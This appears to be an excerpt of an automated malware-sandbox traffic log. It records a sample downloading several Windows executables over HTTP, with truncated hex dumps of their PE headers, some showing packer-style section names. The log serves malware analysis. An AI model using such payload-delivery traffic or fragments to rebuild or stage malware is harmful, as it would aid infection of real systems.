00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:26:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 17:26:06 GMTContent-Type: application/octet-streamContent-Length: 1940480Last-Modified: Thu, 27 Jun 2024 17:09:49 GMTConnection: keep-aliveETag: "667d9cdd-1d9c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 30 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4d 00 00 04 00 00 27 5b 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 12 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 12 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 76 6a 63 7a 6c 77 61 00 90 1a 00 00 90 32 00 00 84 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 79 73 73 70 61 66 63 00 10 00 00 00 20 4d 00 00 04 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4d 00 00 22 00 00 00 7a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 17:27:06 GMTContent-Type: application/octet-streamContent-Length: 2462720Last-Modified: Thu, 27 Jun 2024 15:09:50 GMTConnection: keep-aliveETag: "667d80be-259400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 c8 0a be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 be 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 f0 9c 00 bb 0e 00 00 dc fe 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 